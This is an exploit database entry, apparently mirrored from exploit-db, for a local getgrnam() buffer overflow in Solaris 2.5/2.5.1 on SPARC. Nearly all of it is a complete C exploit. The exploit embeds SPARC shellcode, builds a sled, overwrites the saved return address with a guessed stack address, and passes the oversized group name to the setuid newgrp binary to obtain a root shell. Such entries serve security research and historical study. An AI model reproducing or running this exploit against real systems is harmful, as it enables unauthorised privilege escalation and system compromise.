Solaris 2.5/2.5.1 – ‘getgrnam()’ Local Overflow

Vulnerability ID: 1053513   Vulnerability type: (not listed)
Published: 2001-01-13   Updated: 2001-01-13
CVE ID: N/A
CNNVD-ID: N/A
Platform: Solaris   CVSS score: N/A
| Source
https://www.exploit-db.com/exploits/247
| Details
Vulnerability details have not been disclosed.
| Exploit (EXP)
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/*
   getgrnam() function overflow.

   works against Solaris 2.5/2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.
   [email protected]

*/

/* SPARC payload as published; the "\x" escapes were lost in extraction
   and are restored here (no embedded NUL bytes, so strlen() works on it) */
u_char shell[] =
  "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  "\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* Return the current stack pointer (SPARC inline assembly; the value
   is placed in %i0, which becomes the caller's return register) */
u_long get_sp(void)
{
  __asm__("mov %sp,%i0\n");
}

int main(void)
{
  long *p;
  long addr;
  char buf[8300];
  int i;

  /* Guessed return address: a fixed offset below the current stack pointer */
  addr = get_sp() - 8096;
  printf("Jumping to address %p\n", (void *) addr);

  /* Fill the buffer with a harmless instruction (xor %l3,%l3,%l3) as a sled */
  p = (long *) buf;
  for (i = 0; i < 2050; ++i) *(p++) = 0xa61cc013;

  /* Copy the payload into the sled */
  for (i = 0; i < (int) strlen((char *) shell); ++i) buf[104 + i] = shell[i];

  /* Overwrite the region holding the saved return address with the guess */
  p = (long *) &buf[8160];
  for (i = 0; i < 30; ++i) *(p++) = addr;
  buf[8280] = 0;

  /* Pass the oversized group name to the setuid newgrp binary, which
     hands it to getgrnam() */
  execl("/usr/bin/newgrp", "newgrp", buf, (char *) 0);
  return 0;
}


// milw0rm.com [2001-01-13]
